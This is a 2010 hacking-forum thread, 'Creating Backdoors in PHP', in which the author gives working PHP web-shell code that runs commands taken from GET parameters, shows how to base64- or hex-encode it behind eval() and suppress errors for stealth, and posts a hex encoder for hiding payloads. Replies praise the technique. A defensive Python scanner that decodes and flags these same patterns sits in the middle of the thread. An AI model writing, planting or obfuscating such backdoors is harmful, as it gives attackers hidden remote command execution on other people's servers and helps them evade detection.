#1 MaXe, 29th January 2010, 15:12
Creating Backdoors in PHP

Dear members and guests of InterN0T,


This is a small tutorial on how one could make backdoors in PHP.
The reason why a backdoor may be needed could be if your site
gets hacked, but if there's no protection on the backdoor and
a hacker finds that backdoor, then your site may get hacked that
way too, so be careful with these examples.

First we need to know which functions we can use:
- System(); // Executes an external program.
- Exec(); // Executes an external program.
- Fopen(); // Opens a file on the system.
- Include(); // Includes a file to be executed.
- Eval(); // Executes PHP code.

With that in mind, we move over to how the backdoor can receive input:
- $_GET['var']; // Receives input like: file.php?var=command
- $_POST['var']; // Receives input via the POST-parameter. (LiveHTTPHeaders can be used).
- $_COOKIE['var']; // Receives input via browser-cookies.

Now we might want to encode the backdoor, a few ways are:
- Base64 encoding (base64_encode() is a builtin function).
- Encode it like shellcode: "\xDE\xAD\xBE\xEF";
- And possibly many more ways!

So let's say you want to create a backdoor which uses:
- system() + $_GET[] + base64_encode()

Before encoding anything we write the code that we want to be executed:
PHP Code:
<?php system($_GET['s3cr3t']); ?>
That's how simple it would look if it weren't encoded.

In order to encode it we can either use an application or do it ourselves:
<?php
$var = "system(\$_GET['s3cr3t']);"; // $ needs to be escaped.
echo base64_encode($var);
?>

Which results in: c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7

In order to execute it we need the following PHP code:
PHP Code:
<?php
eval(base64_decode("c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7"));
?>
Which will work fine if we supply a GET-request to the file it is
included in all the time. Otherwise it will send an error to the site
because system() can't handle empty requests.

In order to bypass this issue we could use: error_reporting(0); in
our script. But that results in a lot more code! So why not use
something easier such as @ before the command?

This should suppress all warnings, from system() only of course.

Without encoding the backdoor the code would look like:
PHP Code:
<?php @system($_GET['server']); ?>
Pretty simple? I think so too and I'm glad that I haven't seen
that many problems with PHP backdoors yet since it would be
a pain to check anything you might want to use, for backdoors.

Our backdoor is at this stage very simple but also very small.

One of the first things to implement after using system() or exec()
would be sending the output to <pre></pre> tags so the output is
easy to read which is a good idea when using PHP backdoors.

The other commands we can use, fopen() and include() in short
may be used for LFI and perhaps RFI (depending on php.ini settings).

Eval() can be used to execute PHP code directly which would probably
be one of the most effective backdoors if the hacker knows PHP of course!

That's basically it of what you could or should know about PHP backdoors at the moment.

Update:
I've recently had some more cool ideas (which are hard to implement, yet more stealthy).
I will write about them as soon as I am done with my other projects (I have many at the
moment and there is a lot of testing with my new ideas).

Meanwhile I also created a better application in PHP for creating and encoding backdoors!

Application Link: HaXxd00r


Best regards,
MaXe
__________________

Quote:
Originally Posted by Norph
MaXe, I really doubt that you are able to browse ANY site more than 2 minutes before you start pwning it xD

Last edited by MaXe; 20th February 2010 at 21:17.

#2 Norph, 29th January 2010, 17:16
Re: Creating Backdoors in PHP

nice! :)
I've considered this before, but never really thought about base64 encoding it.
Thanks for sharing. I'll look forward to seeing more of this coming? ;)
+rep
__________________
I asked God for a bike, but I know God doesn't work that way. So I stole a bike and asked for forgiveness.

#3 sud0xe, 29th January 2010, 17:20
Re: Creating Backdoors in PHP

I see a lot of PHP backdoors in nulled scripts and website templates. They mostly use base64 to encode their scripts, but I have seen commercial encoders being used which are a little more complicated to decode.

#4 MaXe, 1st February 2010, 12:38
Re: Creating Backdoors in PHP

Here's a Hex Encoder which should output the string as valid hex-encoding
to be used in f.ex. PHP backdoors, Cross Site Scripting etc.

Please keep in mind that I haven't tested it, I just wrote it in notepad at work.
Code:
<?php

/**
* Hex Encoder 1.0 made by MaXe - Founder of InterN0T.net
**/

$usr_input = isset($_GET['text']) ? $_GET['text'] : $_GET['text']="";


if($usr_input=="") {
echo '
<html>
<head>
<title>HeX Encoder</title>
</head>
<body>
<br />
<center>
<h3>Input a string to encode</h3><br />
<form action="?" method="GET">
<input type="text" name="text" value="" />
<input type="submit" value="Encode" />
</form>
</center>
</body>
</html>
';
} else {
echo '
<html>
<head>
<title>HeX Encoder</title>
</head>
<body>
<br />
<center>
<h3>Use the output below for your PHP backdoor:</h3><br />
HexEncode($usr_input);
<br /><br />
For example, this should work: <br />
eval("'. HexEncode($usr_input); .'");
</center>
</body>
</html>
';
}

function HexEncode($String) {
for ($i = 0; $i < strlen($String); $i++)
    {
        $HexChar = bin2hex($String[$i]);
        echo "\\x" .$HexChar;
    }
}

?>
In short it will output the string like:

\xDE\xAD\xBE\xEF etc and also give an example of how
it can be used like: eval("\xDE\xAD\xBE\xEF");

I might make an encoder for PHP backdoors in the future, just for fun xD

Last edited by MaXe; 2nd February 2010 at 16:45.
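
Seen from the defending side, the base64 and hex wrappers described in posts #1 and #4 can be decoded statically before pattern matching. The following Python scanner is an added example, not code from the thread: its rule names, function names and the "benign" sample are assumptions made here, and the per-statement matching is a heuristic rather than a PHP parser.

```python
import base64
import re
NAMES = r"(?:system|exec|eval|include|fopen)"      # sinks listed in post #1
SINK = re.compile(r"\b" + NAMES + r"\s*\(", re.I)  # PHP function names are case-insensitive
SOURCE = re.compile(r"\$_(?:GET|POST|COOKIE)\b")   # input channels listed in post #1
SUPPRESSED = re.compile(r"@\s*" + NAMES + r"\s*\(", re.I)
OBF_EVAL = re.compile(r'eval\s*\(\s*(?:base64_decode\s*\(|"\\x[0-9a-f]{2})', re.I)
B64_ARG = re.compile(r"base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=]+)\1", re.I)
HEX_LIT = re.compile(r'"((?:\\x[0-9A-Fa-f]{2})+)"')

def decoded_layers(src, max_depth=3):
    """Return [(depth, text), ...]: the source plus every payload decoded out of it."""
    layers, frontier = [(0, src)], [src]
    for depth in range(1, max_depth + 1):
        found = []
        for text in frontier:
            for m in B64_ARG.finditer(text):
                try:
                    found.append(base64.b64decode(m.group(2), validate=True).decode("latin-1"))
                except ValueError:  # malformed base64: nothing to decode
                    pass
            for m in HEX_LIT.finditer(text):
                found.append(bytes.fromhex(m.group(1).replace("\\x", "")).decode("latin-1"))
        layers += [(depth, t) for t in found]
        frontier = found
    return layers

def scan(src):
    """Return sorted (rule, depth) findings; depth counts decoding layers peeled."""
    findings = set()
    for depth, text in decoded_layers(src):
        if OBF_EVAL.search(text):
            findings.add(("obfuscated-eval", depth))
        if SUPPRESSED.search(text):
            findings.add(("error-suppressed-sink", depth))
        # Heuristic: request input and an execution sink inside one statement.
        if any(SINK.search(s) and SOURCE.search(s) for s in text.split(";")):
            findings.add(("request-to-sink", depth))
    return sorted(findings)

# Constructed samples; the first two reuse snippets quoted in post #1.
SAMPLES = {
    "encoded": '<?php eval(base64_decode("c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7")); ?>',
    "plain": "<?php @system($_GET['server']); ?>",
    "benign": '<?php $p = $_GET["p"]; echo htmlspecialchars($p); include("header.php"); ?>',
}

if __name__ == "__main__":
    print({name: scan(code) for name, code in SAMPLES.items()})
```

A hex-escaped literal such as the `eval("\xDE\xAD\xBE\xEF")` form from post #4 goes through the same decoding step and is reported as `obfuscated-eval` at depth 0.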

#5 BuRner, 19th February 2010, 15:10
Re: Creating Backdoors in PHP

Nice script, just the ';' which must be deleted on line 41 after the function call ;)

#6 Except1onX, 20th February 2010, 11:47
Re: Creating Backdoors in PHP

Nice app u made there MaXe. xD
__________________
I live in cmd, so don't bother me asking for dir.

#7 MaXe, 20th February 2010, 21:15
Re: Creating Backdoors in PHP

There's a new app out Except1onX

Link: HaXxd00r ;-D

#8 ne011, 21st February 2010, 09:11
Re: Creating Backdoors in PHP

Quote:
Originally Posted by MaXe View Post
There's a new app out Except1onX

Link: HaXxd00r ;-D

That is cool, MaXe

#9 jhbalaji, 18th May 2010, 18:28
Re: Creating Backdoors in PHP

Great! But how can we use this!
Can you explain!
thanks :)

#10 lostpassword, 18th May 2010, 22:19
Re: Creating Backdoors in PHP

Nice.
The only dark side of a backdoor in PHP is that we can't use it in free hosting services, which don't allow the use of system(), exec() functions.
Anyway, it remains one of the best techniques used in this world, so, good work ;)
__________________
It's just my mind
LinkBack to this Thread: http://forum.intern0t.net/web-hacking-war-games/2192-creating-backdoors-php.html